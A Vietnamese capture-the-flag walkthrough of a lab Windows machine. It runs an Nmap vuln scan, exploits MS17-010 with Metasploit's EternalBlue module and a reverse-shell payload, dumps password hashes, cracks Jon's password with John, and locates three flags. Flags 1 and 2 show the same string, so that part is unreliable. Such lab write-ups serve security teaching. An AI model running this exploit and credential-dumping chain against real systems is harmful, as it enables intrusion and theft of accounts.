Recon

Chạy câu lệnh Nmap sau:

sudo nmap -sV -vv --script vuln TARGET_IP

Giải thích:

  • Bởi vì target machine không phản hồi ICMP nên ta không thể dùng các loại scan bằng ping thông thường.
  • Ngoài ra, trong câu lệnh trên còn sử dụng script vuln để dò các lỗ hổng của target machine.
  • Có thể thời gian quét lâu mà ta muốn thấy progress nên dùng thêm option -vv.

Sau khi quét thì phát hiện lỗ hổng ms17-010.

Gain Access

Tìm kiếm trong Metasploit với từ khóa là ms17-010. Ta có được module:

exploit/windows/smb/ms17_010_eternalblue

Sử dụng module này và set option RHOSTS là IP của target machine.

Sau đó sử dụng thêm payload sau để tạo reverse shell:

set payload windows/x64/shell/reverse_tcp

Sau khi khai thác thì ta có được một session. Dùng tổ hợp phím CTRL + Z để chuyển nó về background.

Escalate

Để nâng cấp từ reverse shell thông thường lên meterpreter thì ta cần dùng module sau:

post/multi/manage/shell_to_meterpreter

Sau đó set option SESSION thành id của session vừa tạo ở phase trước và chạy module này. Nếu thành công ta sẽ nhận được một meterpreter session mới.

Note

Chúng ta cũng có thể chạy lệnh sessions -u id với id là chỉ số của shell cần upgrade thành meterpreter.

Chạy các câu lệnh sau để explore target machine:

  • whoami. Output mong muốn nhận được: NT AUTHORITY\SYSTEM.
  • ps. Output mong muốn nhận được: danh sách tiến trình.

Cracking

Sau khi có meterpreter thì dùng lệnh hashdump để xem password ở dạng hash của các user. Thấy được password của Jon như sau:

Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

Lưu chuỗi này vào file jon.hash.

Dùng John để crack, câu lệnh:

john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt jon.hash

Thu được password của Jon là:

alqfna22

Challenge

Flag 1

Truy cập vào ổ C và ta thấy flag ở trong file flag1.txt:

Success

flag{sam_database_elevated_access}

Flag 2

Password thường được lưu ở C:/Windows/System32/config. Truy cập vào và thấy flag ở trong file flag2.txt:

Success

flag{sam_database_elevated_access}

Flag 3

Tìm kiếm file flag3.txt bằng câu lệnh sau:

dir "flag3.txt" /s

Tìm được file ở thư mục C:\Users\Jon\Documents. Truy cập vào và ta tìm được flag:

Success

flag{admin_documents_can_be_valuable}

Resources